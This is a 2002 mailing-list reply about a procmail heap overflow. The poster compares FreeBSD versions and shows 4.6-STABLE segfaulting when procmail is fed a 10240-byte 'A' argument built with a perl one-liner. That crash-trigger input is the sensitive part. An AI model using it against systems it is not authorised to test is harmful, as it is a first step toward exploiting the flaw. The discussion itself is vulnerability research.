Vulnerability Development mailing list archives
Re: procmail heap overflow
From: Artur Byszko / bikero <bikero () security hack pl>
Date: Thu, 20 Jun 2002 21:27:39 +0200
W Wed, Jun 19, 2002 at 04:00:12PM -0700, Peter Mueller wrote:
Looks like 4.6-PRERELEASE is ok.uname -aFreeBSD xxx.yyy.com 4.6-PRERELEASE FreeBSD 4.6-PRERELEASE #2: Sun May 5 22:57:25 PDT 2002 root@localhost:/usr/obj/usr/src/sys/xxx i386/usr/local/bin/procmail `perl -e '{print "A"x10240}'`=AWord too long.
But in 4.6-STABLE: bikero@phreak:~$ uname -a FreeBSD phreak.uni.cc 4.6-STABLE FreeBSD 4.6-STABLE #1: Wed Jun 19 10:47:52 CEST 2002 bikero () phreak uni cc:/usr/obj/usr/src/sys/bikero-security i386 bikero@phreak:~$ /usr/local/bin/procmail `perl -e '{print "A"x10240}'`=A ^Cprocmail: Terminating prematurely Segmentation fault (core dumped) regards, -- * \x41\x72\x74\x75\x72\x20\x42\x79\x73\x7a\x6b\x6f * * \x62\x69\x6b\x65\x72\x6f\x40\x45\x46\x4e\x45\x54 *
Attachment:
_bin
Description:
Current thread:
- procmail heap overflow flatline (Jun 19)
- Re: procmail heap overflow Ryan W. Maple (Jun 19)
- Re: procmail heap overflow Przemyslaw Frasunek (Jun 19)
- RE: procmail heap overflow Christopher Meiklejohn (Jun 19)
- Re: procmail heap overflow kam (Jun 19)
- Re: procmail heap overflow SpaceWalker (Jun 19)
- Re: procmail heap overflow KF (Jun 19)
- <Possible follow-ups>
- RE: procmail heap overflow Peter Mueller (Jun 19)
- Re: procmail heap overflow Artur Byszko / bikero (Jun 20)
- Re: procmail heap overflow Przemyslaw Frasunek (Jun 21)
- Re: procmail heap overflow Artur Byszko / bikero (Jun 20)
- RE: procmail heap overflow Wodahs Latigid (Jun 20)
- Re: procmail heap overflow Skot (Jun 20)
- RE: procmail heap overflow Peter Mueller (Jun 20)